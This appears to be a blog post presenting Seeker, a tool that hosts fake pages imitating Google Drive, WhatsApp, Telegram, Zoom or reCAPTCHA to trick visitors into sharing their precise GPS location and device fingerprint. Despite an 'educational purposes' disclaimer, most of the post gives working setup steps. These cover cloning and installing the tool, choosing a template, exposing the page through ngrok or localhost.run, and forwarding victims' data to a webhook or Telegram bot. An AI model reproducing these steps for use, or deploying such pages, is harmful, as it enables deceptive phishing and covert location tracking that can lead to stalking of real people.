Seeker: Ethical Hacking Tool for Location and Device Information Gathering

 










Introduction to Seeker

Seeker is a powerful open-source tool designed to demonstrate how malicious websites can exploit location-based permissions and gather sensitive information. Unlike conventional phishing tools that harvest credentials, Seeker simulates a fake webpage requesting location permissions from users. If a user allows the request, Seeker captures precise geographic coordinates along with detailed device information, showcasing how critical permissions like location can be exploited.

Seeker is a proof-of-concept tool created for educational purposes only, highlighting the risks of interacting with untrusted websites and granting unnecessary permissions. Developed by thewhiteh4t, the tool uses advanced methods to collect data and underscores the need for vigilance in cybersecurity.

Features of Seeker

Seeker gathers a wide range of information, divided into two main categories: Location Data and Device Information.

1. Location Data

When the target grants location permissions, Seeker collects:

  • Longitude and Latitude: Pinpoints the exact geographic location.
  • Accuracy: Usually within 30 meters for smartphones.
  • Altitude: Available if the device supports altitude data.
  • Direction and Speed: Captured if the user is moving.

2. Device Information

Seeker gathers the following details without any explicit user permission:

  • Unique device ID via Canvas Fingerprinting.
  • Device Model and Operating System (if available).
  • Platform details (e.g., Android, iOS, etc.).
  • CPU Cores and RAM (approximate values).
  • Screen Resolution and GPU Information.
  • Browser Name and Version.
  • Public and Local IP Address.
  • Local Port.

Additionally, Seeker performs automatic IP reconnaissance, further analyzing the gathered IP address for geographic and ISP information.

Why Seeker is Unique

Unlike traditional IP geolocation tools that rely on ISP data for approximate locations, Seeker uses the HTML5 Geolocation API to gather precise coordinates from the device's GPS hardware. This ensures high accuracy, often pinpointing within 30 meters. If GPS is unavailable (e.g., on laptops), Seeker falls back to IP geolocation or cached coordinates.

How Seeker Works

Seeker hosts a fake webpage designed to mimic popular platforms like Google Drive, WhatsApp, or Telegram. When the target visits the page and grants location permissions, the tool captures their location and device data.

Accuracy Factors

  • Device Hardware: Requires a functional GPS module.
  • Browser Support: Some browsers block JavaScript or restrict location access.
  • GPS Calibration: Improperly calibrated GPS can lead to inaccurate results.

Templates Available in Seeker

Seeker offers a variety of templates to simulate different types of websites:

  • NearYou: A generic template.
  • Google Drive: Suggested by @Akaal_no_one.
  • WhatsApp: Suggested by @Dazmed707.
  • Telegram: Made by @a7maadf.
  • Zoom: Created by @a7maadf.
  • Google reCAPTCHA: Made by @MrEgyptian.

These templates make it easier to convince targets to interact with the fake page.

Ethical Use of Seeker

This tool is for educational purposes only. It demonstrates the types of data malicious websites can gather, emphasizing the importance of avoiding unknown links and not granting unnecessary permissions. Misusing Seeker for unethical purposes is illegal and against the intended use of the tool.

Installation Guide

Seeker can be installed on Kali Linux, Termux, or similar environments. Here’s how to set it up:

Step 1: Clone the Repository

git clone https://github.com/thewhiteh4t/seeker.git

cd seeker/

Step 2: Set Permissions and Install Dependencies

chmod +x install.sh

./install.sh

Step 3: Launch Seeker

Run the following command to start Seeker:

python3 seeker.py

Usage Instructions

Seeker provides several options to customize the attack setup:

Basic Usage

To launch Seeker on the default port (8080):

python3 seeker.py


Use Custom Port

Specify a custom port with the -p option:

python3 seeker.py -p 1337

Generate KML File

Create a KML file (for Google Earth) containing location data:

python3 seeker.py -k <filename>

Select a Template

Choose a specific template using the -t option:

python3 seeker.py -t 1

Enhancing Seeker with Tunnel Services

To make Seeker accessible over the internet, use a tunnel service like ngrok or localhost.run.

Using ngrok

1. Start Seeker:

python3 seeker.py

2. Open another terminal and start ngrok:

./ngrok http 8080

Using Localhost.run

Alternatively, use the following command:

ssh -R 80:localhost:8080 nokey@localhost.run

Advanced Features: Webhooks and Telegram Integration

Sending Data to a Webhook

Configure a webhook endpoint to receive events:

python3 seeker.py --webhook <WEBHOOK_URL>

Telegram Bot Integration

Send collected information to a Telegram bot:

python3 seeker.py --telegram <token:chatId>

Conclusion

Seeker is an advanced tool designed to raise awareness about the potential dangers of granting location permissions and interacting with unknown websites. By simulating real-world scenarios, Seeker highlights the importance of cybersecurity practices, such as avoiding random links and understanding the permissions granted to websites.

Post a Comment

Post a Comment (0)

Previous Post Next Post